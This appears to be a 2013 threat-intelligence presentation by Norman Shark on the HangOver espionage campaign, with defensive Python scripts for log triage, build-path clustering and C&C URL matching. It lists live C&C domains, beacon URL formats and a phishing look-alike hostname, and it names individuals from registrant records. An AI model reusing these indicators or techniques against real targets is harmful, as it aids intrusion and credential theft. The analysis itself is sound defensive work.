Summary: Operation HangOver reveals a landscape of malware, actors, and development patterns. Telenor (Norwegian telco, 17 billion dollars) went public with an intrusion in March 2013. TL;DR of the Telenor intrusion: a spear phishing email carrying a self-extracting ZIP archive that contained conhosts.exe and legal operations.doc; the payload was minimally obfuscated VB binaries connecting via HTTP port 80 to wreckmove.org.
About Me
Jonathan Camp
- Norman Shark, offices in Oslo and San Diego
- American in Norway FTW!

Overview
- HangOver in 60 seconds
- And I care because?
- Intrusion
- Post-Publication
- OSX exploits in the wild
- Next Steps
Disclaimer: "None of the information contained in this presentation is intended to implicate any individual or entity or suggest inappropriate activity by any individual or entity mentioned"

TL;DR
- Telenor: Norwegian telco; 17 billion dollars
- Went public with the intrusion in March 2013
- Spear phishing; known exploits; no stealth; no crypto
- Investigation by Norman Shark uncovered an extensive landscape of malware, actors, and development patterns
- Commoditization, componentization and outsourcing
- Targeting government and the private sector
- Many indicators showing Indian origin

TL;DR: Surveillance Platform
- Industrial espionage
- National security targets

Why is this interesting?
- Scale
- Lack of sophistication
- Organizational aspects
- Script-kiddies += scrum
Why does this even work?

Telenor Intrusion
- Spear phishing email
- Self-extracting ZIP archive containing conhosts.exe and legal operations.doc

Payload
- Minimally obfuscated VB binaries
- Connecting via HTTP port 80 to wreckmove.org
- Beacon (cleartext, fixed query keys, platform and victim ID in the URL):
  GET /flaws/snwd.php?tp=1&tg=[ID]&tv=Error[]&ts=[PLATFORM]
Observed C&C
- wreckmove.org
- infocardiology.biz
- enlighten-energy.org
- researcherzone.net
- 151.237.188.167
- gadgetscorner.org

Telenor Epilogue
- Seemed like a pretty simple phishing case
- Then a second phishing email was seen, pointing at an OWA login look-alike. The hostname starts with the legitimate mail.telenor.no and mimics the CookieAuth.dll?GetLogon query, but the registrable domain is infocardiology.biz, one of the C&C domains above:
  http://mail.telenor.no-cookieauth.dll-getlogon-reason-0.formdir-1-curl-z2fowaz2f.infocardiology.biz
- Followed by an exact copy of toptenreviews.com, hosting a trojaned BitDefender installer

Expansion: Following the trail
- Strong behavioral indicators
- No anti-sandboxing tricks
- Hits in all major public DBs: VirusTotal, malwr, ThreatExpert
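The three Telenor-case indicators above (known C&C hosts, the snwd.php beacon shape, and a hostname that embeds mail.telenor.no but lives under another registrable domain) can be checked against proxy logs. This is an added example, not Norman Shark's tooling: the log format, the trusted-domain list, and every host other than the published C&C indicators are constructed for the demo, and the eTLD+1 logic is a naive last-two-labels approximation rather than a public-suffix lookup.

```python
"""Triage proxy-log lines for the HangOver indicators from the Telenor case.

Added example (not Norman Shark's code). Log format, TRUSTED list and all
hosts other than the published C&C indicators are constructed.
"""
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Published HangOver C&C indicators (Telenor case).
KNOWN_C2 = {
    "wreckmove.org", "infocardiology.biz", "enlighten-energy.org",
    "researcherzone.net", "151.237.188.167", "gadgetscorner.org",
}
# Names we expect to see abused in look-alike hostnames (assumed for the
# example; longest first so the most specific match is reported).
TRUSTED = ("mail.telenor.no", "telenor.no")
# Query keys of the Smackdown beacon: /flaws/snwd.php?tp=..&tg=..&tv=..&ts=..
BEACON_KEYS = {"tp", "tg", "tv", "ts"}


def registrable_domain(host: str) -> str:
    """Naive eTLD+1: last two labels (fine for .org/.biz/.no here; use a
    public-suffix list in production). Bare IPv4 is returned unchanged."""
    labels = host.lower().rstrip(".").split(".")
    if all(l.isdigit() for l in labels):
        return host
    return ".".join(labels[-2:])


def is_lookalike(host: str) -> Optional[str]:
    """Return the trusted name a hostname impersonates, if any.

    The Telenor phishing host began 'mail.telenor.no-cookieauth...' yet sat
    under infocardiology.biz: the trusted name was only a leading fragment.
    """
    h = host.lower()
    for trusted in TRUSTED:
        if h == trusted or registrable_domain(h) == registrable_domain(trusted):
            continue                      # genuinely the trusted domain
        if trusted in h:                  # trusted name embedded elsewhere
            return trusted
    return None


def is_beacon(path: str, query: str) -> bool:
    """Match the snwd.php beacon by script name and fixed query keys."""
    keys = set(parse_qs(query, keep_blank_values=True))
    return path.endswith("/snwd.php") and BEACON_KEYS <= keys


def triage(lines: List[str]) -> List[Tuple[int, List[str], str]]:
    """Return (line_no, reasons, host) for every suspicious request.
    Expected line layout (constructed): '<ts> <client-ip> <method> <url>'."""
    findings = []
    for n, line in enumerate(lines, 1):
        parts = line.split()
        if len(parts) < 4:
            continue
        u = urlsplit(parts[3])
        host = (u.hostname or "").lower()
        reasons = []
        if host in KNOWN_C2 or registrable_domain(host) in KNOWN_C2:
            reasons.append("known-c2")
        if is_beacon(u.path, u.query):
            reasons.append("beacon-pattern")
        hit = is_lookalike(host)
        if hit:
            reasons.append("lookalike:" + hit)
        if reasons:
            findings.append((n, reasons, host))
    return findings


# Constructed log lines: only the C&C hosts and the phishing hostname are
# from the slides; everything else is made up for the demo.
LOG = """\
2013-03-01T09:12:01Z 10.1.2.3 GET http://www.example-news.no/index.html
2013-03-01T09:14:37Z 10.1.2.3 GET http://wreckmove.org/flaws/snwd.php?tp=1&tg=7&tv=Error[]&ts=WinXP
2013-03-01T09:15:02Z 10.1.2.9 GET http://cdn.example-updates.net/flaws/snwd.php?tp=1&tg=9&tv=Error[]&ts=Win7
2013-03-01T09:20:45Z 10.1.2.3 GET http://mail.telenor.no-cookieauth.dll-getlogon-reason-0.formdir-1-curl-z2fowaz2f.infocardiology.biz/
2013-03-01T09:21:10Z 10.1.2.4 GET https://mail.telenor.no/owa/
2013-03-01T09:25:33Z 10.1.2.6 GET http://mail.telenor.no.login-verify.example.com/CookieAuth.dll
2013-03-01T09:30:00Z 10.1.2.5 GET http://151.237.188.167/sdata/shopx.php?fol=TEST
""".splitlines()

if __name__ == "__main__":
    for n, reasons, host in triage(LOG):
        print(f"line {n}: {host} -> {', '.join(reasons)}")
```

The real OWA request on line 5 is left alone because its registrable domain is telenor.no; the two look-alikes are flagged because the trusted name occurs inside a hostname whose registrable domain is something else. Pattern-only matching (line 3) catches the beacon on a host not yet on any blocklist, which is the point of pairing IOC matching with a shape check.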
Following the trail (continued)
- DNS
- URL patterns
- VBScript signatures

Now we have a pile of domain names
- Note: no DGA
- Most domains parked or dead
- But not all: open directories!

Treasure Trove
- Additional signed malware
- Keylogs
- Malware naming and embedded documents reveal potential targets
Exploits
- No 0-days
- Well-known vulnerabilities:
  CVE-2012-0158 (MSCOMCTL.OCX)
  CVE-2012-4792 (IE 6-8 use-after-free)
  CVE-2012-0422 (Java)
- Also seen: get.adobe.flash.softmini.net (adobe/flash look-alike labels under softmini.net)

Smackdown
- VisualBasic downloaders
- Similar (simple) methods of string obfuscation
- Embedded VB project path:
  D:\YASH\PRO\MY\DELIVERED\2012\DOWNLOADERS\compiled\NewSmack(sep2012)\miNaPro.vbp
- Telenor case: C:\miNaPro.vbp

HangOver aka Hanove
- Second stage malware, C++
- Recursively scans for Office documents
- Uploads via HTTP or FTP
- Commonish UserAgents
- Alternate names from debug paths: HangOver, Ron, Dragonball, Tourist, Klogger, FirstBlood and Babylon

Targeting
- Sinkhole logs
- Strange domain names
- Social engineering attempts
Pakistan
- Two thirds of the addresses in the sinkhole logs
- Upload path names the victim machine (the 15-character EMBASSYOFPAKIST looks like a NetBIOS computer name followed by its description):
  GET /sdata/shopx.php?fol=EMBASSYOFPAKIST-Embassy%20of%20Pakistan
- And many more

China
- Industrial espionage

Telenor

Other possible targets
- Eurasian Natural Resources Corporation
- Bumi PLC, Indonesia
- Porsche Informatik
- Chicago Mercantile Exchange

Chicago Mercantile Exchange
- cmegroups.net spoofing cmegroup.com
- Same IP as other HangOver C&C
- Complaint filed with WIPO
From the WIPO case: "The disputed domain name had been used by an imposter who has claimed to be the secretary of the Complainant's president Terrence Duffy. Using the email address []@cmegroups.net the imposter has requested investment information on the pretext that it was sought by Mr. Duffy."

Attribution 101: Why?
1. Law enforcement: stop the bad guys. Most stringent burden of proof.
2. Correlation: expanded gathering of evidence. Concerned with similarity of actors rather than who.

Attribution 101: How? (and why each source is weak on its own)
- Strings: can be faked
- DNS registrations: not authenticated
- Signed binaries: certificates can be stolen
- Function signatures: benign libraries
- URL/C&C patterns: copypasta and benign libraries
- OSINT (open source intelligence): not validated

"The problem with internet quotes is that you can't always depend on their accuracy" -- Abraham Lincoln, 1864

strings FTW
R:\payloads\ita nagar\Uploader\HangOver 1.5.7 (Startup)\HangOver 1.5.7 (Startup)\Release\Http_t.pdb
C:\Users\neeru rana\Desktop\Klogger- 30 may\Klogger- 30 may\Release\Klogger.pdb
C:\Users\Yash\Desktop\New folder\HangOver 1.5.7 (Startup) uploader\Release\Http_t.pdb
...\May Payload\new keylogger\Flashdance1.0.2\...
...\Monthly Task\August 2011\USB Prop\...
...\Sept 2012\Keylogger\Release\...
...\June mac paylods\final Klogger-1 june-Fud from eset5.0\Klogger- 30 may\...
...\final project backup\complete task of ad downloader& usb grabber&uploader\...
...D:\YASH\PRO\MY\DELIVERED\2012\DOWNLOADERS\compiled\...

strings FTW
C:\BNaga\backup_28_09_2010\threads tut\pen-backup\BB_FUD_23\Copy of client\Copy of client\appinbot_1.2_120308\Build\Win32\Release\appinclient.pdb
C:\BNaga\kaam\Appin SOFWARES\RON 2.0.0\Release\Ron.pdb
C:\BNaga\SCode\BOT\MATRIX_1.2.2.0\appinbot_1.2_120308\Build\Win32\Release\deleter.pdb
C:\Documents and Settings\Administrator\Desktop\Backup\17_8_2011\MATRIX_1.3.4\CLIENT\Build\Win32\Release\appinclient.pdb
D:\Projects\Elance\AppInSecurityGroup\FtpBackup\Release\Backup.pdb

Domain Game
- Several hundred names
- Most with private registration
- Correlation muddied by sinkholes and parked domains
- Fingerprint open services (e.g. ESMTP)
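The "strings FTW" slides pivot on what build paths leak: Windows profile names (Yash, neeru rana), build-drive roots (BNaga, YASH), versioned project folders (HangOver 1.5.7, MATRIX_1.x, appinbot_1.2) and PDB file names. The following is an added example, not Norman Shark's tooling, of pulling those paths out of binaries (the CodeView RSDS record for PDB paths, plain NUL-terminated strings for VB6 .vbp project paths) and clustering samples on the hints they share. The sample blobs are constructed stand-ins that carry the paths quoted on the slides; the sample file names are made up.

```python
"""Cluster samples by the build paths they leak. Added example, not Norman
Shark's tooling. Sample blobs are constructed; the paths inside them are the
ones quoted on the slides.
"""
import re
import struct
from collections import defaultdict
from typing import Dict, List, Set

# CodeView record: "RSDS", 16-byte GUID, 4-byte age, NUL-terminated path.
RSDS_RE = re.compile(rb"RSDS[\x00-\xff]{20}([ -~]{4,260}?)\x00")
# VB6 binaries embed the .vbp project path as a plain NUL-terminated string.
VBP_RE = re.compile(rb"([A-Za-z]:\\[ -~]{4,260}?\.vbp)\x00")

USER_RE = re.compile(r"\\(?:Users|Documents and Settings)\\([^\\]+)\\", re.I)
ROOT_RE = re.compile(r"^[A-Za-z]:\\([^\\]+)\\")
# "<Name> 1.2.3" or "<name>_1.2": a versioned project folder.
PRODUCT_RE = re.compile(r"\b([A-Za-z]+)[ _]\d+(?:\.\d+)+")
GENERIC_ROOTS = {"users", "documents and settings"}


def extract_build_paths(blob: bytes) -> List[str]:
    paths = [m.group(1).decode("ascii") for m in RSDS_RE.finditer(blob)]
    paths += [m.group(1).decode("ascii") for m in VBP_RE.finditer(blob)]
    return paths


def hints_for(path: str) -> Set[str]:
    """Developer handle, versioned product folder and file name from one path.
    Profile name and drive root share the 'handle:' prefix so that
    C:\\Users\\Yash and D:\\YASH land in the same cluster."""
    hints = set()
    m = USER_RE.search(path)
    if m:
        hints.add("handle:" + m.group(1).lower())
    m = ROOT_RE.match(path)
    if m and m.group(1).lower() not in GENERIC_ROOTS:
        hints.add("handle:" + m.group(1).lower())
    for product in PRODUCT_RE.findall(path):
        hints.add("product:" + product.lower())
    hints.add("file:" + path.rsplit("\\", 1)[-1].lower())
    return hints


def cluster(samples: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Return {hint: [sample names]} for every hint shared by more than one sample."""
    groups = defaultdict(set)
    for name, blob in samples.items():
        for path in extract_build_paths(blob):
            for h in hints_for(path):
                groups[h].add(name)
    return {h: sorted(n) for h, n in sorted(groups.items()) if len(n) > 1}


def make_rsds(path: str, age: int = 1) -> bytes:
    """Constructed stand-in for a PE carrying an RSDS record (GUID zeroed)."""
    return (b"MZ" + b"\x90" * 24 + b"RSDS" + b"\x00" * 16
            + struct.pack("<I", age) + path.encode() + b"\x00" + b"\xcc" * 8)


def make_vb(path: str) -> bytes:
    """Constructed stand-in for a VB6 binary with its .vbp path embedded."""
    return b"MZ" + b"\x90" * 24 + path.encode() + b"\x00" + b"\xcc" * 8


# Constructed samples; file names are made up, paths are from the slides.
SAMPLES = {
    "http_t_a.exe": make_rsds(r"R:\payloads\ita nagar\Uploader\HangOver 1.5.7 (Startup)\HangOver 1.5.7 (Startup)\Release\Http_t.pdb"),
    "http_t_b.exe": make_rsds(r"C:\Users\Yash\Desktop\New folder\HangOver 1.5.7 (Startup) uploader\Release\Http_t.pdb"),
    "smack.exe": make_vb(r"D:\YASH\PRO\MY\DELIVERED\2012\DOWNLOADERS\compiled\NewSmack(sep2012)\miNaPro.vbp"),
    "klogger.exe": make_rsds(r"C:\Users\neeru rana\Desktop\Klogger- 30 may\Klogger- 30 may\Release\Klogger.pdb"),
    "ron.exe": make_rsds(r"C:\BNaga\kaam\Appin SOFWARES\RON 2.0.0\Release\Ron.pdb"),
    "deleter.exe": make_rsds(r"C:\BNaga\SCode\BOT\MATRIX_1.2.2.0\appinbot_1.2_120308\Build\Win32\Release\deleter.pdb"),
    "appinclient_a.exe": make_rsds(r"C:\BNaga\backup_28_09_2010\threads tut\pen-backup\BB_FUD_23\Copy of client\Copy of client\appinbot_1.2_120308\Build\Win32\Release\appinclient.pdb"),
    "appinclient_b.exe": make_rsds(r"C:\Documents and Settings\Administrator\Desktop\Backup\17_8_2011\MATRIX_1.3.4\CLIENT\Build\Win32\Release\appinclient.pdb"),
}

if __name__ == "__main__":
    for hint, names in cluster(SAMPLES).items():
        print(f"{hint:22} {', '.join(names)}")
```

Each hint is a weak signal on its own (paths can be faked, as the slide says), so the useful output is the overlap: the same PDB name compiled under two different handles, or one handle spanning several tools, is what turns "strings" into a correlation.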
Malicious Domains
NITR0RAC3.COM, VALL3Y.COM, S3RV1C3S.NET, GAUZPIE.COM, BLUECREAMS.COM
Registrant: NA Prakash (mail@gmail.com) Jain TY-76, Kohat Enclave Delhi Delhi,110034 IN Tel. +011.9873456756

Domain Suspension
- PrivacyProtect.org provides private DNS registration

Privacy Fail
PIEGAUZ.NET (compare GAUZPIE.COM above; this one was registered without the privacy service)
Registrant: Appin Technologies Rakesh Gupta (rakesh.gupta@appinonline.com) 9th Floor, Metro Heights,NSP, PitamPura, Delhi Delhi,110034 IN Tel. +91.1147063300

Post-Publication
- Samples received by Norman Shark that attempt to contact a known HangOver domain

OSX Exploitation and Attribution
- Oslo Freedom Forum, May 16th: F-Secure reported new OS X spyware
- Mach-O universal (i386, x86_64)
- Contacted: securitytable.org and docsforum.info
- Both seen as part of previous HangOver research

Apple Dev IDs
- Oslo malware was signed with an Apple Dev ID
[Image via F-Secure]

URL Correlation
- 10 samples with identical Apple Dev IDs
- securitytable.org/lang.php
- torqspot.org/App/MacADV/up.php?cname=%@&file=%@
- docsforum.info/lang.php
- liveapple.eu/ADMac/up.php?cname=%@&file=%@&res=%@
  (%@ is the Objective-C NSString format placeholder, so these are format strings recovered from the binaries)
- Search VxDB for php?cname=file=
- Two different target OSes, different domains, same URL pattern

Code Flow
Disassembled a few OS X binaries:
1. Search for *.doc, *.ppt, *.xls
2. Compress documents
3. POST to server
4. Ensure crontab entry (persistence)
5. Loop
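The "same URL pattern" pivot above works because the C&C URL shape (script name plus the query keys, values dropped) survives a change of domain and of target platform. This added example, not Norman Shark's VxDB tooling, fingerprints URLs that way and also reproduces the "php?cname=file=" pivot as a key-set search. The URL list mixes the strings quoted on the slides with constructed noise; windows-sample.example is a made-up stand-in for the Windows-side sample the slide refers to, not a real indicator.

```python
"""Group C&C URLs by shape and search by query keys. Added example, not
Norman Shark's code. URLs on example.* hosts are constructed noise.
"""
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple
from urllib.parse import parse_qsl, urlsplit


def _split(url: str):
    if "://" not in url:
        url = "http://" + url          # slide lists URLs without a scheme
    return urlsplit(url)


def shape(url: str) -> Tuple[str, Tuple[str, ...]]:
    """(script, keys): last path component plus query keys in emitted order,
    values dropped. Key order is kept because the implants emit it fixed."""
    u = _split(url)
    script = u.path.rsplit("/", 1)[-1].lower()
    keys = tuple(k.lower() for k, _ in parse_qsl(u.query, keep_blank_values=True))
    return script, keys


def shape_str(url: str) -> str:
    script, keys = shape(url)
    return script + ("?" + "&".join(k + "=" for k in keys) if keys else "")


def host_of(url: str) -> str:
    return (_split(url).hostname or "").lower()


def group_by_shape(urls: Iterable[str]) -> Dict[str, List[str]]:
    """{shape: sorted hosts}: hosts sharing a shape are correlation candidates."""
    groups = defaultdict(set)
    for url in urls:
        groups[shape_str(url)].add(host_of(url))
    return {s: sorted(h) for s, h in sorted(groups.items())}


def pivot(urls: Iterable[str], required: Iterable[str]) -> List[str]:
    """Hosts whose query keys include every required key (the
    'php?cname=file=' search), regardless of script name or extra keys."""
    need = {k.lower() for k in required}
    return sorted({host_of(u) for u in urls if need <= set(shape(u)[1])})


# From the slides: Mac samples, the Windows beacon, the Pakistan upload.
# Constructed: example.* noise and the windows-sample.example stand-in.
URLS = [
    "securitytable.org/lang.php",
    "torqspot.org/App/MacADV/up.php?cname=%@&file=%@",
    "docsforum.info/lang.php",
    "liveapple.eu/ADMac/up.php?cname=%@&file=%@&res=%@",
    "http://wreckmove.org/flaws/snwd.php?tp=1&tg=[ID]&tv=Error[]&ts=[PLATFORM]",
    "http://151.237.188.167/sdata/shopx.php?fol=EMBASSYOFPAKIST-Embassy%20of%20Pakistan",
    "http://windows-sample.example/x/up.php?cname=%s&file=%s",
    "http://www.example.com/index.php?id=7",
    "http://cdn.example.net/up.php?file=a.jpg",
]

if __name__ == "__main__":
    for s, hosts in group_by_shape(URLS).items():
        print(f"{s:32} {', '.join(hosts)}")
    print("cname+file:", pivot(URLS, {"cname", "file"}))
```

The exact-shape grouping separates up.php?cname=&file= from up.php?cname=&file=&res= (a later build added a key), while the key-set pivot pulls both in together with the Windows-side stand-in and leaves out cdn.example.net, whose up.php only carries file=. In practice the shape is what to search a URL database for once the domains have rotated.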
Where now?
- Operation HangOver could have been prevented by the most basic of security precautions

Closing questions & comments
- MAG2 (Norman's Malware Analyzer G2 sandbox) saw it. Why didn't AV work? Signature definitions can lag by days or weeks
- Step 1: assume users are dumb... er, special. Step 2: ?
- Behavioral (dynamic) analysis is a mandatory component of any security infrastructure

Special Thanks
Snorre Fagerland & Morten Kråkvik, Norman Shark AMD Team

For more information:
jonathan.camp@norman.com
@NormanSec, @irondojo
Black Hat 2013, Booth 321
Full Report: http://normanshark.com/hangoverreport/